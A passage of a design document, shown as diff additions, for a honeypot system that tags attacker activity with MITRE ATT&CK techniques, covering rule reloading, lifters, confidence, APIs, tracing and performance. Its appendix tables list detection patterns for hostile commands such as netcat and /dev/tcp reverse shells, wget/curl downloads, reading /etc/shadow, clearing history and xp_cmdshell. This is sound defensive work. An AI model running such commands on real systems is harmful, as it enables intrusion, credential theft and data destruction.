per-rule). State changes publish `ttp.rule.state.{rule_id}`. +4. In-flight evaluations finish on the rule snapshot they + started with (immutable per-eval); next evaluation uses the + new compiled form. + +**"Atomic swap" — concrete definition.** Two requirements must +both hold: + +1. **Recompile is single-threaded.** All compile work runs in one + asyncio task (the store's change-handler loop). Two filesystem + events arriving simultaneously are processed in order, never + in parallel. This eliminates the "rule A's `emits` grew from 1 + to 2 mid-walk" class of torn-state bug. +2. **Dispatch index values are frozen and replaced wholesale.** + The engine's index is `dict[str, FrozenCompiledRule]` where + `FrozenCompiledRule` is an immutable dataclass. To "atomically + swap" a rule, the store assigns a new frozen value to the + `rule_id` key — a single GIL-atomic dict assignment. Readers + walking the dict during the swap see either the old frozen + value or the new one, never a half-mutated object. Mutating + any field of an existing frozen value is forbidden by + construction (`frozen=True` raises). + +The combination gives us: no parallel writers, no in-place +mutation. Concurrent readers (event evaluations) are safe under +arbitrary edit pressure without a single explicit lock. + +**Threading-model caveat.** Property (2) — single-statement dict +assignment being observably atomic to readers — relies on the +CPython GIL. Under PEP 703 / `--disable-gil` free-threaded +builds, this guarantee is no longer language-level; a torn read +becomes possible in principle. We run the GIL build today and +plan to keep doing so for v0/v1, so the property holds. If we +ever opt into a no-GIL build, the dispatch index needs an +explicit lock or a copy-on-write swap (e.g. +`MappingProxyType(new_dict)` reassigned to a single attribute). +This is a one-line change behind a feature flag, not a redesign — +documenting it here so a future contributor running on a no-GIL +interpreter doesn't think the design is broken. + +**No on-disk pickled cache.** `re.Pattern` is not stable across +Python versions; bind-mounted/replicated caches drift; the +operational complexity exceeds the benefit at our rule counts. +The trigger condition for revisiting this is in Hard parts §10 +(graduation triggers). + +**`expires_at` is opt-in, not default.** A `disabled` state +without an explicit expiry persists until manually re-enabled. +TTL-by-default would be too magic — operators would re-enable +critical rules they didn't realise had auto-reverted. Explicit +expiry is the right call; the `ttp.rule.state.{rule_id}` event +fires on TTL expiry too, so dashboards reflect the auto-revert. + +### 2. Behavioral lifters (v0.5) + +Trivially derived from data already present. Per-Attacker tags use +the Attacker row as anchor; cross-IP signals use `identity_rollup`. + +| Source signal | Scope | Tactic | Technique | Sub-technique | Confidence | +|--------------------------------------------------------|-----------|---------|------------|----------------|------------| +| `behavior_class=brute_force` | Attacker | TA0006 | T1110 | (none) | 0.95 | +| `behavior_class=scanning` | Attacker | TA0007 | T1046 | (none) | 0.90 | +| `behavior_class=scanning` | Attacker | TA0043 | T1595 | (none) | 0.90 | +| `behavior_class=beaconing` | Attacker | TA0011 | T1071 | (none) | 0.80 | +| `behavior_class=beaconing` | Attacker | TA0011 | T1029 | (none) | 0.75 | +| `tool_guesses` contains `hydra` | Attacker | TA0006 | T1110 | T1110.001 | 0.95 | +| `tool_guesses` contains `nmap` | Attacker | TA0007 | T1046 | (none) | 0.90 | +| `tool_guesses` contains `nmap` | Attacker | TA0043 | T1595 | (none) | 0.90 | +| `tool_guesses` contains `sqlmap` | Attacker | TA0001 | T1190 | (none) | 0.95 | +| `CredentialReuse` row, ≥3 IPs same creds same identity | Identity | TA0006 | T1110 | T1110.003 | 0.90 | +| `CredentialReuse` row, ≥3 services same creds | Identity | TA0006 | T1110 | T1110.004 | 0.85 | +| Identity has ≥3 distinct ASNs over <24h | Identity | TA0042 | T1583 | T1583.003 | 0.70 | + +### 3. Intel lifter (v0.5 — opportunistic, never required) + +Reads `AttackerIntel` rows produced by the `decnet enrich` worker +and emits high-precision tags from third-party verdicts. The +single hard rule: this engine MUST tolerate the absence of intel +data without errors, log noise, or affecting other lifters' output. + +**Inputs.** One `AttackerIntel` row per attacker UUID, populated +by the enrich worker. Per-provider columns are nullable; the +lifter handles each provider independently — a partial verdict +(GreyNoise responded, AbuseIPDB didn't) still produces the +GreyNoise-derived tags. + +**Triggers.** + +- `attacker.enriched` — primary; wakes the lifter for one attacker. +- `attacker.session.ended` — secondary; reads any + already-populated intel row at session close, in case the + session ended after the enrichment cache was warmed but before + the worker received the bus signal. + +**Output anchoring.** `source_kind = "intel_verdict"`, +`source_id = AttackerIntel.uuid`. `attacker_uuid` set; never +identity-rollup (intel is per-IP). + +**Confidence formula.** Final tag confidence = +`rule_confidence × normalize(provider_score)`, where +`normalize(...)` projects the provider's native score range onto +`[0.0, 1.0]`. Per-provider normalization is pinned, not folklore: + +- **AbuseIPDB** returns `abuseConfidenceScore` ∈ `[0, 100]`; + normalize as `score / 100.0`. +- **GreyNoise** returns a categorical `classification` in + `{benign, unknown, malicious}`; normalize as + `{benign: 0.0, unknown: 0.5, malicious: 1.0}`. +- **Feodo Tracker** is binary listed/not-listed; normalize as + `1.0` if listed, else the lifter emits no tag. +- **ThreatFox** returns a `confidence_level` ∈ `[0, 100]`; + normalize as `score / 100.0`. + +AbuseIPDB at `abuseConfidenceScore=30` in category 18 produces a +`0.85 × (30 / 100.0) = 0.255` tag — below the 0.3 floor, so +nothing is written. AbuseIPDB at `abuseConfidenceScore=95` in the +same category writes `0.85 × 0.95 = 0.808`. The normalized score +is what ends up in `IntelEvidence.score` (already in `[0.0, 1.0]`) +— consumers never see the provider's native scale. + +**Boundary discipline.** Per Hard parts §7: raw provider blobs +(`greynoise_raw`, `abuseipdb_raw`, `feodo_raw`, `threatfox_raw`) +stay in `AttackerIntel`. The tag's `evidence` column carries a +pointer (`{"intel_uuid": "…", "provider": "abuseipdb", +"category": 18, "score": 95}`) and nothing more. The full provider +verdict is one join away for analysts who want it. + +See Appendix A.10 for the per-provider mapping tables and Appendix +B for the rule IDs. + +### 4. Email lifter (v0.5) + +The largest single signal source after shell commands. Both relay +and non-relay SMTP services capture full messages — every header, +the DATA body, and any attachments. The lifter consumes the +`email.received` bus signal, runs the message through a battery of +rules, and emits per-message tags. + +Engine surface: + +``` +email_lifter.tag(message: SMTPMessage) -> list[TTPTag] +``` + +`SMTPMessage` projection includes: + +- `mail_from`, `rcpt_to_list`, `auth_user` (if AUTH was used) +- All headers as a list (preserves duplicates and order — the + `Received:` chain matters) +- Parsed `From:`, `Return-Path:`, `Reply-To:`, `Subject:`, + `Date:`, `User-Agent:`/`X-Mailer:`, `DKIM-Signature:`, + `Authentication-Results:` +- Body (plaintext + HTML parts) +- Attachments with hash, name, MIME type, decoded preview for + Office formats + +Output anchors: `source_kind = "email"` for whole-message tags, +`"email_header"` / `"email_body"` / `"email_attachment"` for +content-specific tags. `source_id` = the message UUID. +`session_id` = SMTP session, `attacker_uuid` = sending IP's +Attacker row. + +See Appendix A.6 for the rule catalogue. + +### 5. Sigma adapter (post-v1) + +Curated subset of community Sigma rules, hand-reviewed, mapped to +our event shapes. Most Sigma rules are Windows event-log specific +and don't apply to a Linux honeypot fleet — the curated subset is +realistically <100 rules. Worth doing, not first. + +### 6. Biometric lifters (deferred — Appendix D) + +When `SessionProfile` columns become populated by the keystroke +ingester (and any further biometric FKs land on `AttackerIdentity`), +the biometric lifter reads them via the `session_id` / +`identity_uuid` joins on `ttp_tag`. No `ttp_tag` schema change. + +### 7. ML / LLM (deferred indefinitely) + +Only when rules genuinely tie. Local classifier — never a hosted +one against attacker shell logs or email contents. Out of scope +until rules are proven insufficient. + +--- + +## UKC bridge + +`decnet/clustering/ukc.py` gains `tactic_to_ukc_phase()`: + +```python +ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = { + "TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance + "TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development + "TA0001": UKCPhase.DELIVERY, # Initial Access + "TA0002": UKCPhase.EXECUTION, # Execution + "TA0003": UKCPhase.PERSISTENCE, # Persistence + "TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation + "TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion + "TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access + "TA0007": UKCPhase.DISCOVERY, # Discovery + "TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement + "TA0009": UKCPhase.COLLECTION, # Collection + "TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control + "TA0010": UKCPhase.EXFILTRATION, # Exfiltration + "TA0040": UKCPhase.IMPACT, # Impact + + # ATT&CK for ICS — first-class projection so MQTT / Conpot / + # Modbus tags don't silently drop out of campaign rollups when + # `commands_by_phase_on_decky` projects through this map. + # ICS uses an independent tactic-ID range; we cover only the + # tactics referenced by Appendix A.7 (Conpot, MQTT). Adding + # other ICS tactics is a one-line addition + one A.7 row. + "TA0100": UKCPhase.COLLECTION, # ICS: Collection + "TA0102": UKCPhase.DISCOVERY, # ICS: Discovery + "TA0105": UKCPhase.IMPACT, # ICS: Impact + "TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control +} +``` + +`OBSERVABLE_PHASES` (defined in `decnet/clustering/ukc.py`) is the +subset of `UKCPhase` values we can plausibly observe on a honeypot +fleet. The pre-target phases (`RECONNAISSANCE`, +`RESOURCE_DEVELOPMENT`, `WEAPONIZATION`, `SOCIAL_ENGINEERING`) are +deliberately excluded — TTP tags must never assign them, and the +inverse `ukc_phase_to_tactic()` is documented-lossy on those +phases. The CDD test in E.2.9 pins this asymmetry. + +The campaign clusterer's `IdentityFeatures.commands_by_phase_on_decky` +adapter is rewritten to read from `ttp_tag` joined to +`attacker_command`, project tactic to UKC, and group. The +synthetic-fixture path is unchanged — fixtures keep emitting UKC +directly; the production path finally produces the same shape. + +--- + +## Confidence model + +Every rule declares a base confidence. The worker can adjust it +downward (never upward) based on: + +- **Honeypot context.** A command typed against a low-realism + decky carries less weight than one typed against a high-realism + one. Multiplier from decky `realism_score` if/when that field + exists; otherwise 1.0. +- **Repetition.** A scan signature observed once is `0.7 × base`; + observed across ≥3 deckies is `1.0 × base`. +- **Session length.** Aggregate rules with `min_attempts` already + encode this; per-event rules don't adjust. +- **Identity coherence.** Tags written via identity-rollup lifters + carry inherent confidence floors because they only fire when + cross-Observation evidence is consistent. + +The dashboard exposes a confidence floor knob (default 0.6) so +analysts can hide low-confidence noise without touching rules. + +`confidence < 0.3` is dropped at write time. + +--- + +## API surface + +``` +GET /api/v1/ttp/techniques — distinct techniques observed, + with counts and last-seen ts +GET /api/v1/ttp/by-identity/{identity_uuid} — PRIMARY: Identity-scoped heatmap +GET /api/v1/ttp/by-attacker/{attacker_uuid} — per-IP slice +GET /api/v1/ttp/by-campaign/{campaign_uuid} — campaign-wide rollup +GET /api/v1/ttp/by-session/{session_id} — session timeline of tags +GET /api/v1/ttp/rules — rule catalogue +POST /api/v1/ttp/rules/{rule_id}/state — admin only; sets RuleState + (disable / clip / TTL) +DELETE /api/v1/ttp/rules/{rule_id}/state — admin only; reverts to + default enabled state +GET /api/v1/ttp/export/navigator — MITRE ATT&CK Navigator JSON + layer for the current fleet +GET /api/v1/ttp/export/navigator/identity/{uuid} + — Navigator layer for one + Identity (the demo) +``` + +**Authorization.** `GET` endpoints require a valid JWT +(per the project's auth-gated convention; 401 without). The state +mutation endpoints (`POST` / `DELETE` on +`/rules/{rule_id}/state`) require **admin** role, enforced +server-side per the project's "no client-side role checks" rule. +A non-admin JWT receives 403 on the mutation endpoints; an absent +JWT receives 401. The CDD plan E.2.8 covers this with explicit +parametrized assertions. + +`navigator` exports are the SOC-facing payoff. A SOC analyst pastes +the JSON into the official Navigator and sees coverage immediately. + +## UI surface + +**Empty state — day one.** A fresh deployment has zero tags. The +`IdentityDetail` "TTPs Observed" section renders an explicit +empty state: a one-line "No techniques observed yet." There is +no spinner, no "loading", no fallback to a placeholder list. The +Navigator export endpoint returns a valid-but-empty Navigator +JSON layer so a SOC analyst pasting it into the official +Navigator sees the file load with no highlighted techniques — +correct, not broken. + +The first tag appears on first attacker contact after the +rule_engine completes one evaluation (typically <100ms after +session start for any matched primitive). intel_lifter +contributes its first tags only after the enrich worker +completes one provider pass for that attacker (seconds to +minutes, depending on provider rate limits). identity-rollup +tags appear only after enough cross-IP data accumulates for the +clusterer / credential-reuse worker to fire — minutes to days +depending on traffic. None of this is documented in the UI; it +is the natural unfolding of "telemetry produces data, lifters +turn it into tags." + +**Primary:** `IdentityDetail` (whatever surface the Identity page +becomes — see `IDENTITY_RESOLUTION.md`) gains a **TTPs Observed** +section as the headline behavioral readout for an Identity: + +- Tactic → technique tree, with counts and confidence-weighted + bars +- Click-through to evidence (the original command / log line / + email / payload) +- "Export as Navigator layer" button, scoped to this Identity + +**Secondary:** `AttackerDetail` (stays a full page per project +convention) gains a TTPs section showing the per-IP slice — useful +when an Identity has many member Attackers and the analyst is +isolating one IP's contribution. + +`/campaigns/{id}` aggregates TTPs across member Identities. + +The fleet-level Navigator export goes on the Stats / Overview page. + +--- + +## Observability: tracing and metrics + +Project-wide lesson: good tracing pays back hard over time. +Routers already use `@_traced("…")` decorators; OTEL collector is +wired (`development/docker-compose.otel.yml`). The TTP worker +emits spans across the **entire pipeline**, not just the worker +loop. Every transition from human edit to attacker telemetry to +written tag is traceable end-to-end. + +**Span hierarchy (top-down):** + +``` +ttp.rule.ingest (operator action) + ├─ ttp.rule.parse (YAML → CompiledRule) + ├─ ttp.rule.validate (Pydantic schema check) + └─ ttp.rule.publish (filesystem→store, store→bus) + +ttp.rule.state.change (set_state API call) + ├─ api.rules.set_state (existing router @_traced) + ├─ ttp.store.write_state (DB insert / in-mem dict) + └─ ttp.rule.publish (state-change bus event) + +ttp.eval (one source event tagged) + ├─ ttp.eval.dispatch (resolve applicable rules) + ├─ ttp.lifter.{name} (one span per lifter that ran) + │ └─ ttp.rule.fire (one span per rule that matched, + │ with rule_id + technique_id + │ attributes) + ├─ ttp.tag.write (DB insert) + └─ ttp.bus.publish (ttp.tagged emission) + +ttp.api.{endpoint} (existing router @_traced + pattern; adds tag-count + attribute on responses) +``` + +**Metrics (counters / histograms):** + +- `ttp.rule.compiled` — counter, `{rule_id, store_backend}`. +- `ttp.rule.state.changed` — counter, `{rule_id, new_state}`. +- `ttp.eval.events` — counter, `{source_kind, lifter}`. +- `ttp.eval.latency_ms` — histogram, `{source_kind, lifter}`. +- `ttp.rule.fire` — counter, `{rule_id, technique_id, confidence_band}`. +- `ttp.tag.written` — counter, `{technique_id, sub_technique_id}`. +- `ttp.tag.dropped` — counter, `{reason}` where reason ∈ + {"below_floor", "rate_limited", "rule_disabled"}. +- `ttp.bus.published` — counter, `{topic}`. + +Every span carries `attacker_uuid` (when available) and +`identity_uuid` as attributes so a SOC analyst tracing one +identity's session can pull the entire tag-production timeline +from the trace store. + +**No PII in attributes.** Per the email PII discipline (Hard +parts §6) and the enrichment-vs-tag boundary (Hard parts §7): +span attributes carry pointers (UUIDs, hashes, technique IDs, +rule IDs) — never raw command content, email bodies, payload +bytes, or fingerprint blobs. The trace store is not the right +home for sensitive content. + +## Bus delivery requirements + +The DECNET bus is abstract — `decnet/bus/{base.py, factory.py, +…}` defines the contract; the current production impl is UNIX +sockets (`unix_client.py`, `unix_server.py`). Other impls +(network bus, in-memory test fake) plug in via the factory. +Delivery semantics are **per-impl**, not pinned globally. + +The TTP design declares per-event durability *requirements*; the +bus impl satisfies them. If an impl can't (e.g., the in-memory +fake), tests must catch that mismatch. + +**Required delivery semantics per topic family:** + +| Topic | Required | Catch-up if dropped | +|---------------------------------------|-------------------|-----------------------------------| +| `attacker.session.ended` | at-least-once | none — must not drop | +| `attacker.enriched` | best-effort | session.ended re-reads intel row | +| `email.received` | at-least-once | none — must not drop | +| `credential.reuse.detected` | best-effort | session.ended catch-up | +| `canary.{token_id}.triggered` | at-least-once | none — must not drop | +| `identity.formed` / `identity.merged` | best-effort | next session.ended re-evaluates | +| `ttp.tagged` | best-effort | downstream consumers tail DB | +| `ttp.rule.reloaded.{rule_id}` | at-least-once | store re-reconciles on restart | +| `ttp.rule.state.{rule_id}` | at-least-once | store re-reconciles on restart | + +Two topic families MUST NOT silently drop: source-event triggers +that have no catch-up path (`session.ended`, `email.received`, +`canary.triggered`) and rule-state changes (otherwise a worker +in a swarm could miss a "disable rule" command and continue +firing). The current UNIX-socket impl is a single-writer single- +reader pipe over the same host — drops would indicate a kernel- +level failure rather than a routing one, so it satisfies these +requirements transitively. Future network-bus impls (e.g., NATS +JetStream) need explicit configuration to satisfy "at-least-once" +where required. + +## Performance targets + +Pinned for v0; bounds future optimisation discussions. + +| Metric | Target | +|----------------------------------------------|------------------| +| Per-event evaluation latency (p95) | < 50 ms | +| Per-event evaluation latency (p99) | < 200 ms | +| Source-event ingest sustainable (per worker) | ≥ 500 events / s | +| Tag-write throughput sustainable | ≥ 200 tags / s | +| Store load on worker startup (rule pack v0) | < 2 s | +| Hot-reload latency (file save → swap) | < 500 ms | +| `set_state()` end-to-end | < 100 ms | +| API: `/by-identity/{uuid}` p95 | < 100 ms | + +The two throughput rows are pinned **independently** so neither +hides behind the other. The relationship between them is +event-rate-dependent — at the rule pack v0 average of ~3 tags per +matched event, the 200 tags/s tag-write target translates to +~67 matched-events/s, well below the 500 events/s ingest target +because most ingest events match zero rules. A busy fleet under a +brute-force storm with high match density (5+ tags/event) crosses +the 200 tags/s line before it crosses the 500 events/s line; in +that regime the bottleneck is tag-write, not eval. Either bound +hitting first is a profile-and-fix signal — not a signal to raise +the other target to compensate. + +These match the project's API-level "100 RPS, zero degradation" +target (project memory: API improvements). Per-worker numbers; a +multi-worker swarm scales horizontally. + +If implementation hits any of these ceilings, the discussion is +"profile and fix", not "raise the target". The targets are a +contract. + +## Hard parts + +### 1. Confidence calibration + +A user typing `id` is technically T1033 (System Owner Discovery). +Without confidence + an evidence pointer, the dashboard floods with +low-signal noise that drowns the actual brute-force storms. + +Mitigation: per-rule confidence is mandatory in YAML; rules below +0.6 are hidden by default; aggregate rules are preferred over +per-command rules for ambiguous primitives. + +### 2. Multi-protocol session rollup + +`T1078 (Valid Accounts)` only matters in conjunction with +subsequent activity. SSH login alone is noise; SSH login followed +by SMB share enumeration is signal. Per-event tagging cannot +capture this; we need session-end aggregate rules that look at the +full event timeline. + +Mitigation: rules with `phase: session_end` run once per closed +session, with the full event list visible. Initial pack should +include 3–5 such rules to prove the shape. + +### 3. Sigma rules don't transfer cleanly + +The community Sigma ruleset assumes Windows event logs (Sysmon, +Security 4624 etc.). DECNET observes shell, HTTP, SMB on Linux. A +bulk import would yield mostly inapplicable rules. Hand-curate. + +### 4. Reconnaissance: pre-target vs active + +UKC `reconnaissance` and ATT&CK TA0043 mean different things. +ATT&CK Reconnaissance includes active scans against our deckies — +we can absolutely observe those. UKC reconnaissance is pre-target +OSINT which we cannot. Don't conflate. + +### 5. Sub-technique granularity needs cross-event context + +T1110 has four sub-techniques: + +- `.001` Password Guessing — repeated tries, same account, varying + password. Per-session detectable. +- `.002` Password Cracking — offline; not observable here. +- `.003` Password Spraying — same password, many accounts. Needs + cross-account view → identity-rollup lifter. +- `.004` Credential Stuffing — known-good creds replayed. Needs + `CredentialReuse` join → identity-rollup lifter. + +Per-command rules top out at `T1110` (no sub); cross-IP lifters +add the sub-technique with `source_kind = "identity_rollup"`. + +### 6. Email PII discipline + +SMTP messages contain real PII — recipient addresses, body +contents, subject lines, attachment file names. Tagging rules must +never write that content into `ttp_tag.evidence` verbatim. The +evidence column carries: + +- Hashes (e.g. SHA-256 of the body) — referenceable, not readable. +- Header *names* and *patterns matched*, not full header values. +- Attachment hashes and MIME types, not file contents. +- Recipient *count* and *domain set*, not individual addresses. + +The original message stays in the SMTP service's storage tier +behind RBAC. The TTP layer points at it via `source_id` for +analysts who have the role to read it. Tags themselves are +PII-light by construction so dashboards / SIEM exports don't leak. + +### 7. Enrichment vs tag boundary + +Several signal sources — bulk SMTP messages, the canary +fingerprint payload, raw sniffer fingerprints — produce far more +data than belongs in `ttp_tag`. The boundary: + +- **Enrichment** (NOT in `ttp_tag`): the full structured payload. + Bulk fingerprint blob (canvas hash, font list, WebGL details, + perf jitter samples, full SMTP headers, raw payload bytes) lives + in its source-of-truth table — `Attacker.fingerprints`, + `AttackerBehavior`, the SMTP store, the canary worker's + fingerprint store. These are joined by analysts when they want + the raw artefact. +- **Tag** (in `ttp_tag`): only specific behavioral derivations. + "webdriver === true" produces a T1059 tag; the full navigator + blob does not. "From/Return-Path mismatch" produces a T1036 tag; + the full header set does not. + +Why this matters: dumping fingerprint blobs into +`ttp_tag.evidence` would balloon row size, leak per-attacker unique +identifiers through technique queries (a `WHERE technique_id = +'T1059'` query shouldn't return canvas hashes), and turn the +ATT&CK heatmap into an attacker-uniqueness leak. The evidence +column carries a *pointer* to the source row plus the *minimum +payload* needed to verify the rule fired — never the raw artefact. + +### 8. ATT&CK matrix drift + +MITRE renames techniques between ATT&CK releases. T1086 became +T1059.001. T1100 became T1505.003. Sub-techniques split off main +techniques. Old tags can reference IDs that no longer exist when +exported against a current Navigator, and the analyst sees broken +links. + +Mitigation: the matrix release is **pinned per row** via +`ttp_tag.attack_release` (e.g. `"enterprise-v15.1"`, +`"ics-v15.1"`). Each rule pack also stamps the release it was +authored against; the worker writes the pack's release into every +tag the rule emits. Concretely: + +- The rule YAML schema has a top-of-file `attack_release:` key. + The Pydantic validator rejects rules without it. +- A rule pack version bump that adopts a new ATT&CK release is a + `rule_version` bump on every affected rule, not a silent + rewrite. Old tags retain their old `attack_release`; new tags + carry the new one. The two cohorts coexist by design. +- The Navigator export endpoint groups tags by `attack_release` + and emits one Navigator layer per release. Mixing releases in a + single layer would silently misalign techniques. +- **Startup-time consistency check — FAIL LOUD.** At worker boot, + the rule pack is parsed and the union of `attack_release` values + is computed. If that set is not a singleton, OR if the singleton + value does not equal the worker-bundled + `decnet/ttp/_attack_matrix.py:BUNDLED_ATTACK_RELEASE` constant, + the worker raises `AttackReleaseMismatchError` from the bus-loop + bootstrap and **refuses to start**. Not a warning. Not a log + line. A startup error that an operator must resolve before any + tag is written. A warning would let pre-v1 → v1 silently drift + on the next matrix release; a hard failure forces the conscious + decision. Tested in E.2.5 with two rules carrying different + `attack_release` values — assert worker boot raises and emits + zero `ttp.tagged` events. + +Quarterly DEBT.md review covers both this and intel-provider +drift below. + +### 9. Intel provider drift + +AbuseIPDB occasionally adds new abuse categories. GreyNoise +revises its classification taxonomy. ThreatFox extends IOC types. +The intel_lifter's mapping tables (Appendix A.10) are static +catalogues; they will fall behind reality. + +Mitigation: + +- **Each provider mapping is a versioned rule** (`R0054`–`R0057`). + When a provider adds a category, bump `rule_version`, update the + mapping, ship a new rule pack. Old tags keep their old + `rule_version` so historical evidence survives. +- **Unknown categories produce no tag**, not a fallback. A new + AbuseIPDB category nobody has mapped yet is silently ignored + rather than tagged as some "generic abuse" technique. False + silence is recoverable; false labels poison the SOC. +- **Quarterly review.** Add a note to DEBT.md to re-walk each + provider's category catalogue every quarter post-v1, until the + mapping tables stabilise. + +### 10. When to graduate from filesystem store to database store + +`FilesystemRuleStore` is the default and right for single-host +deployments. There are three graduation triggers; any one of them +flips the operator to `DatabaseRuleStore`: + +1. **Multi-host swarm.** Rules need to flow operator → master → + all workers without redeploys. The filesystem path requires + rsync-on-deploy for every rule edit; the DB path makes it a + single write that all workers tail. Day-one switch for any + swarm deployment. +2. **State must survive restart.** The filesystem store holds + `RuleState` in-process. A worker crash loses every disable / + clip / TTL state. Acceptable for dev, unacceptable for + production where a misbehaving rule has been disabled and + must stay disabled across restarts. +3. **Operator-driven rule edits via UI/API.** When operators edit + rules through the dashboard rather than git commits to + `./rules/ttp/`, the source of truth shifts to the DB. The + filesystem becomes a snapshot/export target rather than the + primary. + +**What we explicitly DO NOT graduate to:** an on-disk pickled +compiled-rule cache. `re.Pattern` is not stable across CPython +versions; bind-mounted caches drift; the cache becomes another +deploy artefact with its own invalidation bug class. The +graduation path is filesystem → DB, never filesystem → +disk-pickle. This is a one-line lock on a future contributor's +"obvious optimisation". + +The trigger for revisiting any of this is rule count exceeding +~1000 with the DB store still showing measurable startup latency. +At that point the conversation is "compile cache invalidated by +`(rule_id, rule_version)` tuple, NOT pickle" — the cache stores +re-compilable source plus pre-validated structure, never +serialized regex objects. + +### 11. False-positive blast radius on webhooks + +Webhook fanout triggers on `ttp.tagged`. A buggy rule that fires +on every SSH `ls` would flood the SIEM. Mitigation: + +- Per-rule rate limit (writes per attacker per minute) clipped at + the worker. +- `ttp.rule.suppressed` topic so suppression is observable. +- Rule rollback path: bump `rule_version`; old tags filterable. +- The Loop-prevention invariant (canonical statement in "Bus + topics" above) keeps an enrichment subscriber from + self-amplifying through `ttp.tagged` re-emission. Without it, + webhook rate limits would be the only thing preventing an + infinite fanout — and rate limits are mitigation, not a + correctness guarantee. + +--- + +## Open questions + +- **Backfill strategy.** Tagging forward is simple; tagging the + past 90 days of attacker_command rows is a separate worker mode. + Out of scope here, tracked under DEBT. +- **Rule pack distribution.** Ship in-tree at v1. Post-v1, consider + a signed-bundle channel. +- **Federation.** Cross-org sharing of rule packs and aggregate + TTP heatmaps. Defer to federation work. + +--- + +## Appendix A — Telemetry inventory per service + +Per-service catalogue of observable events and their first-pass +ATT&CK mappings. **One row per (event, technique) pair** — events +implicating multiple techniques appear as multiple rows. + +Confidence bands: H = ≥0.85, M = 0.6–0.85, L = <0.6 (informational +only; not shipped in v0). + +### A.1 Remote access + +#### SSH (real OpenSSH, high interaction) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Auth attempt failed | TA0006 | T1110 | (none) | M | +| ≥5 fails / 5 min, varying password | TA0006 | T1110 | T1110.001 | H | +| Same password ≥3 accounts | TA0006 | T1110 | T1110.003 | H | +| Successful auth on weak cred | TA0001 | T1078 | (none) | M | +| `cat /etc/passwd` | TA0007 | T1083 | (none) | M | +| `cat /etc/shadow` | TA0006 | T1003 | T1003.008 | H | +| `wget http*` | TA0011 | T1105 | (none) | H | +| `curl http*` | TA0011 | T1105 | (none) | H | +| `chmod +x` | TA0005 | T1222 | T1222.002 | M | +| `chmod +x` then exec | TA0002 | T1059 | T1059.004 | H | +| `crontab -e` write | TA0003 | T1053 | T1053.003 | H | +| `/etc/cron*` write | TA0003 | T1053 | T1053.003 | H | +| `useradd` | TA0003 | T1136 | T1136.001 | H | +| Direct write to `/etc/passwd` | TA0003 | T1136 | T1136.001 | H | +| `history -c` | TA0005 | T1070 | T1070.003 | H | +| `unset HISTFILE` | TA0005 | T1070 | T1070.003 | H | +| `sudo -l` | TA0007 | T1033 | (none) | M | +| `sudo su` | TA0004 | T1548 | T1548.003 | M | +| `uname -a` | TA0007 | T1082 | (none) | L | +| `lsb_release` | TA0007 | T1082 | (none) | L | +| `id` | TA0007 | T1033 | (none) | L | +| `whoami` | TA0007 | T1033 | (none) | L | +| `netstat -an` | TA0007 | T1049 | (none) | M | +| `ss -tnp` | TA0007 | T1049 | (none) | M | +| `ip addr` / `ifconfig` | TA0007 | T1016 | (none) | M | +| `arp -a` | TA0007 | T1016 | (none) | M | +| `find / -perm -u=s` (recursive) | TA0007 | T1083 | (none) | M | +| `find / -perm -u=s` (SUID predicate) | TA0004 | T1548 | T1548.001 | H | +| `nc -e` reverse shell | TA0002 | T1059 | T1059.004 | H | +| `nc -e` reverse shell | TA0011 | T1071 | (none) | H | +| Bash `/dev/tcp/` reverse shell | TA0002 | T1059 | T1059.004 | H | +| Bash `/dev/tcp/` reverse shell | TA0011 | T1071 | (none) | H | +| HASSH match → known C2 framework | TA0011 | T1071 | T1071.001 | H | +| Keystroke fingerprint = automated | TA0002 | T1059 | (none) | M | + +#### Telnet (busybox telnetd) + +Inherits the SSH shell-command catalogue. Adds: + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Mirai-style connect+exec sequence | TA0001 | T1190 | (none) | H | +| Mirai-style connect+exec sequence | TA0011 | T1105 | (none) | H | +| Default IoT creds (root/root) | TA0006 | T1078 | T1078.001 | H | +| Default IoT creds (admin/admin) | TA0006 | T1078 | T1078.001 | H | + +#### RDP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| NLA auth attempt | TA0006 | T1110 | (none) | M | +| ≥5 fails / 5 min | TA0006 | T1110 | T1110.001 | H | +| Successful auth | TA0001 | T1078 | (none) | H | +| Successful auth | TA0008 | T1021 | T1021.001 | H | +| Screen-capture observed (probe) | TA0009 | T1113 | (none) | M | + +#### VNC + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| RFB handshake from known scanner UA | TA0043 | T1595 | T1595.001 | H | +| Auth attempt | TA0006 | T1110 | (none) | M | +| Successful auth | TA0008 | T1021 | T1021.005 | H | + +### A.2 Databases + +#### MySQL / Postgres / MSSQL + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Auth attempt fail / brute | TA0006 | T1110 | (none) | H | +| `SELECT ... FROM mysql.user` | TA0006 | T1003 | (none) | H | +| MSSQL `xp_cmdshell` | TA0002 | T1059 | (none) | H | +| MSSQL `xp_cmdshell` | TA0001 | T1190 | (none) | H | +| `LOAD DATA INFILE` (MySQL) | TA0009 | T1213 | (none) | H | +| `COPY FROM` (Postgres) | TA0009 | T1213 | (none) | H | +| `INTO OUTFILE` (MySQL) | TA0010 | T1567 | (none) | H | +| `COPY TO` (Postgres) | TA0010 | T1567 | (none) | H | +| `pg_read_server_files` | TA0007 | T1083 | (none) | H | +| `pg_ls_dir` | TA0007 | T1083 | (none) | H | +| `DROP DATABASE` mass | TA0040 | T1485 | (none) | H | +| `TRUNCATE` mass | TA0040 | T1485 | (none) | H | + +#### MongoDB + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Unauth `listDatabases` | TA0007 | T1082 | (none) | H | +| `db.dropDatabase()` mass | TA0040 | T1485 | (none) | H | +| Ransom note insert pattern | TA0040 | T1486 | (none) | H | + +#### 